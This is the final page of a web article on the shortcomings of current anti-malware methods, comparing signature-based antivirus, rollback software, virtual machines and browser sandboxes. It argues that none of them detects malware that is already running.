10. What’s Missing?

Problems with present anti-malware methods

The present way of protecting computers against malware such as viruses, worms, Trojans, and spyware is basically reactive. It depends on a local database of information about known malware in order to recognize and disarm the invaders. Some attempt is made at using so-called “heuristic” techniques to recognize new malware that is not in the database but maintaining the protection still requires constant updating of the local database. Also, since the different types of malware have different behaviour patterns and signatures, more than one type of protection is needed. Although software suites may combine the different kinds of protection in one package, many people end up with a hodgepodge of different applications. For example, a user might have an anti-virus program, a software firewall, a hardware firewall, three anti-spyware programs, an email filter, two Trojan removers, and various Internet toolbars for blocking popups, ads, phishing, JavaScript, etc.

Having to run all these programs and having to constantly update them is not only cumbersome but also makes a hit on system performance. The fact is, even with constant updating, systems are still vulnerable to so-called “zero-day” and undocumented exploits. The constant parade of new security problems makes it clear that something better than the current approach to safeguarding computers is needed.

Rollback methods

There are already several possible alternative ways to go. One is the procedure used on many systems that are open to the public in places like libraries and schools. A standard system configuration is established and any changes, including malware, that occur on the system during an individual login session are erased when the user is finished. The system is simply returned to its standard configuration. DeepFreeza software is an example. People can do anything they want to the system or even get it infected by malware but when it is rebooted it returns to its original pristine state. This is very satisfactory for a setup which remains static but can be tedious where a user installs a lot of new software or frequently creates new files.

Virtual machines

Another approach that is attracting more and more attention is the use of “virtual” machines. The equivalent of several independent operating systems can be created on one computer. This is especially attractive for those who install or test a lot of software. You can have one virtual machine that is the standard setup and another test machine that gets exposed to the Internet. If the test machine gets infected, it is deleted and the standard setup is copied. Creation of new data files on a virtual machine is no different from a regular computer. Installation of new software can be tried on the test machine first to make sure that the software is legitimate or has no undesirable effects. It is also possible to have a host machine that can access a virtual machine while the virtual machine is ignorant of the existence of the host. The average home PC user, however, may not be quite ready for the virtual machine approach.

Sandboxes for Internet browsers

Related to virtual machines are “sandboxes”. This technique creates an area on the system that is isolated from the rest of the system. Any malware infection that occurs in the sandbox is prevented from spreading system-wide. By placing the Internet browser in the sandbox, infections from the Internet are quarantined to the sandbox.

What these approaches cannot do?

Inherent in many of the sandbox products is the idea that end-users must make a trust decision on whether to erase, save, or execute downloaded content. Taken to one extreme, if end-users erase all content after every session, how would their system, applications, or browsers receive upgrades or security patches? Taken to the other extreme, if users save or execute all content, they will end up infected or negate the need for the additional protection. Ultimately, with varying levels of assistance from the product, the end-user must make the key decision on whether or not to save and execute the data from each session.

None of these alternative techniques can detect already running malware. So if the user is provoked to install a malware disguised as a legitimate browser add-on for instance, using social engineering techniques, then the sandbox running the browser instance or the virtual machine will not intimate anything to the user. Moreover, if a spyware is installed in a sandboxed browser instance, then all the sensitive information recorded by the spyware at that time could be successfully stolen, without the sandbox/virtual machine raising any exception.

What’s missing?

Hence a user remains vulnerable to all sorts of security threats on the internet, to varying degrees; in spite of employing the best know anti-malware mechanisms. A more complete solution is needed to fill this void.


[1] http://vlaurie.com/computers2/Articles/new_paradigm.htm
[2] http://pcworld.about.com/od/securit1/Sandbox-Security-Versus-the-Ev.htm

pages: 1 2 3 4 5 6 7 8 9 10


Comments are closed.

This site is protected with Urban Giraffe's plugin 'HTML Purified' and Edward Z. Yang's Powered by HTML Purifier. 46123 items have been purified.